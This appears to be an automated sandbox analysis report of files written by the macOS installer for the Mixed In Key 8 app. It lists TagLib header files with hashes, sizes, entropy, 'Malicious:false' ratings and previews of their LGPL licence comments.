                                                                                                    SHA-512:FB4E95EA0F72EC0F5E6BDF654015187DC995CDDC47B1862C31B67FB5172EDC20ADCBB5A013F111701CF9FD3FCF4E8AD68300E2BB56D0CDBA888D110EB2325330
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /**************************************************************************. copyright : (C) 2010 by Luk.... Lalinsk... email : lalinsky@gmail.com. **************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_JK1HYP
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):4474
                                                                                                    Entropy (8bit):4.345208088452255
                                                                                                    Encrypted:false
                                                                                                    MD5:4F568A7E8AA213C07851C8FFC56F5E40
                                                                                                    SHA1:D9BD5BD9B68A1B910112F1404B79FCFD1DA4C592
                                                                                                    SHA-256:2D715BF14B3E286E857918813BCC5DEF75D9770B11AFE7AAF95B2DED480A0C92
                                                                                                    SHA-512:D7132D9B4F7FCAA75273A4CB049BAD652BF6BB88EC00672B4B0BA5458CAF3CEF05771E84BB8C2149B3F0DDEA8800419EE27F73922E9EFB66BB28F1CC779675E0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_Kt8ww1
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):5384
                                                                                                    Entropy (8bit):4.41046070959146
                                                                                                    Encrypted:false
                                                                                                    MD5:D02CB83424B4A392E5A5E503B418088A
                                                                                                    SHA1:C93ACAB6F146B4E5957D5E5F354B4BF996217AB0
                                                                                                    SHA-256:3E28246CB7FA97584DCE9351A48F1907BF2FBBA06F4612AEAFA3450DB9CD3635
                                                                                                    SHA-512:B799D1D997155DB985CB493DBEC48FA6E1C9889F775692DE320FC17F7902F2E7381EBA1DBDFB5539F30AAAF8CF0D7E6B19F46786EF82EAC984DFC91FF0DD692F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2011 by Lukas Lalinsky. email : lalinsky@gmail.com. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_Kw2Rhd
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):4174
                                                                                                    Entropy (8bit):4.288674519278943
                                                                                                    Encrypted:false
                                                                                                    MD5:C7245A68235F8F6E0B6833F303BC2CD7
                                                                                                    SHA1:F6B964568827A812A704E148CB38C5207ABCAC60
                                                                                                    SHA-256:0BF35D569C3FDFF7520A36511F6AE8437AC5EE8B738E4AEB113B900674257F13
                                                                                                    SHA-512:559AAE81E5853712249CB9673BCB9499E005E2DB36192747271E4B235831104D7C259AE0DBB54DA2EAA75F0A08CE59286D31C5B37597B708CA6EC9479DA14033
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2003 by Ismael Orenstein. email : orenstein@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_L2iAqW
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):6244
                                                                                                    Entropy (8bit):4.2697355194636435
                                                                                                    Encrypted:false
                                                                                                    MD5:7768AA251CE98FD94FB81E08F0ED05F5
                                                                                                    SHA1:D1491D849D1A9C4A29FD1B290D00846BAB9AE870
                                                                                                    SHA-256:AD1861F48BC0BBBCE36883EC0D2E2DE3C9500A71BF83801983447FC774BBCAE6
                                                                                                    SHA-512:D4631C8E97EEB6AC9921F51CE801ECDB45B8A52BCA58F51E9D73EB9908D9E0694A517C23CC9A0B34143B8DE5C74EFFF8B835847A269362DB575C68A30B459AC9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /**************************************************************************. copyright : (C) 2005-2007 by Luk.... Lalinsk... email : lalinsky@gmail.com. **************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_Lomtv4
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):2176
                                                                                                    Entropy (8bit):4.324003047484079
                                                                                                    Encrypted:false
                                                                                                    MD5:2DF04427E326351DCABACCC9D5D0B328
                                                                                                    SHA1:F86E5B04F726D1B2BCFEBF0B17D0AB8000D1497B
                                                                                                    SHA-256:B65ABEC6E40EA460228BB55DBD30721CA65371324C557FDE00ED12C67120038C
                                                                                                    SHA-512:66F4353A2DC2897491951F6A27BCF9C26482285BF96CAFAC74611DF1574A58409602DEE6D8C5E25D4294C1A8C5E72DC11D30B5842786654573D38757159A0D1B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_M58WDa
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):4926
                                                                                                    Entropy (8bit):4.344956732648442
                                                                                                    Encrypted:false
                                                                                                    MD5:300F31911AE03B34D9138C3B1EE879F2
                                                                                                    SHA1:85B7731658ED349BD45F7F6EA0473845B8DF83EA
                                                                                                    SHA-256:7F5917B42F2E7CCA6178E5B711466A34870605E599677918C0677FDB9F93BABC
                                                                                                    SHA-512:136F911E1F8D0CB55856DDF11F0CEBAE948DEBE8C9B60C55EE25AA1593294E6463EB95D55C01370D5AFD92D076C16D458A3528DE24AEE4A8D7513B3794D659FC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_MQ6YgO
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):4267
                                                                                                    Entropy (8bit):4.2664145597461705
                                                                                                    Encrypted:false
                                                                                                    MD5:195F1A6901FA93B1238CEFB5F6631B63
                                                                                                    SHA1:919BB9B8C6EEC51448C2A7D77A68C71EE5378C91
                                                                                                    SHA-256:E3918EFA339A679C947EA37B6B4187803401A564256A2A6BE29DEF782740E200
                                                                                                    SHA-512:5BD4B1A951710B038EA650124AA8AE818A23B608CFAF41D0D9DD6B45B65E50D283C57F4B75514EC92F5BFBEE1D8DA7CF447F0B451DCB97EDABD2803FC5D37CD3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2006 by Luk.... Lalinsk... email : lalinsky@gmail.com.. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. (original MPC implementation). ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A P
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_MtaGKF
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):6597
                                                                                                    Entropy (8bit):4.4303291227923856
                                                                                                    Encrypted:false
                                                                                                    MD5:9D3352A0EA6A62C45961177E180E817A
                                                                                                    SHA1:FC7DB5F99BDB19750B2F29BFDA27B9511B3DA23D
                                                                                                    SHA-256:FCFAF1C29DBDCB868DD1D96A64C47EC86425262AC1A137B00B4BC00D0A901B10
                                                                                                    SHA-512:D005FFB66E3D475DE8ADAE9F049D9C541A78968955A6009C089D3DAC7899929F685AC7B67855E1AE82F661F91EB6276A3F7B5F2DEF67816AB7B61AA34625E166
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2012 by Tsuda Kageyu. email : tsuda.kageyu@gmail.com. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_N2LJUQ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):9515
                                                                                                    Entropy (8bit):4.429449595136447
                                                                                                    Encrypted:false
                                                                                                    MD5:BDBB5C2ECA01519135AF3985A1941E69
                                                                                                    SHA1:36F5DACE6335B2A426D894C9E012E47BC8F4203B
                                                                                                    SHA-256:A9CB46B4EE94F8E52A46FBF16F25CBAFE892DCC16CE001BE613EBDDE09919A07
                                                                                                    SHA-512:1A80D95EEA3FCCFD6D84761A70A1B6E0E74F71C1C885D8518965DD202281E2605AD736FF388B234E965D5260924D0A75C3D9A4B3388729A41ECFAF1C52DA3FF6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_ONujt0
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):6333
                                                                                                    Entropy (8bit):4.271153532802757
                                                                                                    Encrypted:false
                                                                                                    MD5:5B6836226BA22DE96FD6C2F4E7B3A749
                                                                                                    SHA1:0D596D6B98D66CD6A3A896DA448BBB200B78DE69
                                                                                                    SHA-256:3B1899C07A3EA9D7CD332EBA1C0329F2903CA175B72F5245BE499D6FF761F92F
                                                                                                    SHA-512:46AFE604FD1EBC4520BDBE446E1A55E9C1852F340E16112CE79B622EF4DB4FE23EFD22C2978656D72D56FF379BCCAFACE90C420FF5C2CB266BD821C5CA7B6FE3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_OqZrNs
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):8914
                                                                                                    Entropy (8bit):4.348664929741424
                                                                                                    Encrypted:false
                                                                                                    MD5:856E64C3F8DF696B4A8CB76EB18E85CD
                                                                                                    SHA1:8FAA8569768416F837CD30B176BA40BD328C6C55
                                                                                                    SHA-256:79382C647AE54070EBECA9949A1C7D2955EBE22AC0211915F9E4171E35F5D34A
                                                                                                    SHA-512:467211EAEDE0B3F0196D8B52C01477B6F68C88B3826165BC894C1F556A1DA17C070A9F07331DC7DCD1FE15B485F265FFF70E7FAB843C437796A5C1C5500F1A65
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2013 by Lukas Krejci. email : krejclu6@fel.cvut.cz. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_P2q8Qr
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):4584
                                                                                                    Entropy (8bit):4.269561378781429
                                                                                                    Encrypted:false
                                                                                                    MD5:DE02255238842F4B49FCDB573AD0F0A2
                                                                                                    SHA1:72A05A13BA6F5253875CFC8354DD260C8AFA0EED
                                                                                                    SHA-256:020697064B8AF1C2CF64A0D19FD0E8EE02755632F85B686C39EF130FA86D7042
                                                                                                    SHA-512:AE0BF33DA74AD130719EFEBB70507574AA0BEEE4848DCA7D9656B6F17CA74996D37D2FBD7C3B9190DBF67604FC0760C17CB96EE64961522BE2860464955860A1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_P44n7a
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):9649
                                                                                                    Entropy (8bit):4.464446446381054
                                                                                                    Encrypted:false
                                                                                                    MD5:A708924EC63C608B8B583B75EF4A6A08
                                                                                                    SHA1:46E1F9CC6EC18D22F2A8AEC0BF10A8F880E076C7
                                                                                                    SHA-256:31BEC66202BDD9814E34C3908855D072892226728C209E67DE87FC128CC815E1
                                                                                                    SHA-512:AC18B399749C5A1631DB1979D052C6ABB5CE8A1ECD6384B1710F5597FF2850F2B999C3EC94C0D069010DAC37A35CDF53634BEB3D2D62D904CC685261E37C460D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_POI7pe
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):2701
                                                                                                    Entropy (8bit):4.384408152950914
                                                                                                    Encrypted:false
                                                                                                    MD5:D55EE334F0B48B04A3C65EBDA66803FF
                                                                                                    SHA1:E1678014023E0E690F225CA78A190CC6BF81ACFB
                                                                                                    SHA-256:6455E55ECCC5E72EF87E5887D150A89DC1FF2B9DB58612CCA055D8B58087AF74
                                                                                                    SHA-512:56311A8483B33EC9B5FED04295D80FE23944659A4BE503F0E919784E33DFDDBDD8A19EBF2CE2410BE2A0E32AD8964BB7CB6F9C6C895B3C9D44430D0680C412AF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2011 by Mathias Panzenb..ck. email : grosser.meister.morti@gmx.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_PQk0cD
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):17007
                                                                                                    Entropy (8bit):4.528103666067434
                                                                                                    Encrypted:false
                                                                                                    MD5:1556132384018F3D0F03C0C8CA306C98
                                                                                                    SHA1:EE6EA17E3BD999B9D5794D37F53E9A6C78891E4E
                                                                                                    SHA-256:69410F5C764954592537AE2020334D7AD03E0AB41D8A66A2F2392D5A185E54F5
                                                                                                    SHA-512:9D1693BDA0D0E41AFABC8DB22D2B7640C16D29259CAB09E0F998A26EF4312D63E6189F1303B38CBBCBCB7B2E63DDA52D8309FD3A8A5F1880CB6A91E5EB663629
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_QBdXxw
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):3575
                                                                                                    Entropy (8bit):4.298881783076291
                                                                                                    Encrypted:false
                                                                                                    MD5:679DE168888C0CA7CEE0B0C6D4937CBB
                                                                                                    SHA1:38CF7EAFD7A0D73C08B45D779B11260062BBCC7E
                                                                                                    SHA-256:939AEF066CFBD615624867721C42EA1AEDA017B75765198CC0ECCCCF6455B02C
                                                                                                    SHA-512:997F3619DEDFFC4C36B396F4889121065A42B4AF1B99A3DA58474ADC794F9304316B9811B9828087EA0490A3E6449B8DDB9A2498EF40DE2B2FF72B47C8EB81C3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2011 by Mathias Panzenb..ck. email : grosser.meister.morti@gmx.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_RdoxTJ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):8113
                                                                                                    Entropy (8bit):4.3854357721952395
                                                                                                    Encrypted:false
                                                                                                    MD5:DEE5F40556EF54F02AC2A7137612E982
                                                                                                    SHA1:EAE6B2880EC07933C59E39BFF25DA917222491E4
                                                                                                    SHA-256:4D76FB9CC293E91FF85A575A9B051D93068E384E171AD0C7E18F0C5321A2A571
                                                                                                    SHA-512:169F29368C294FEA9DE4D5D921C9D82DB6393B1E5ED2F6620E7C409B4C8F41914A0C8D61A334724328D7A0B4E44438B892ED0B6CDE365995872BFBFECB5DEDE1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2010 by Alex Novichkov. email : novichko@atnet.ru.. copyright : (C) 2006 by Luk.... Lalinsk... email : lalinsky@gmail.com. (original WavPack implementation).. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. (original MPC implementation). ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_S5eopU
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):5193
                                                                                                    Entropy (8bit):4.298333676347026
                                                                                                    Encrypted:false
                                                                                                    MD5:58F17CBA9BB781E31FF5F89F351E15D6
                                                                                                    SHA1:643D972B65F22BA54FF581FBAD98215C3681DD9A
                                                                                                    SHA-256:2E0A808BCDFE006775EBE2DB49B9D72104217BDD18EF91772F31D55CB7D02ADD
                                                                                                    SHA-512:FBA85FDB7745F966DBEE29A28CD2566196534B179BE1AA683CB2A64AD5EBC60C5307A4B2612E086C404447444FA5734B7DCDE22E7A22490A72A9342E9500AAAD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2008 by Scott Wheeler. email : wheeler@kde.org.***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
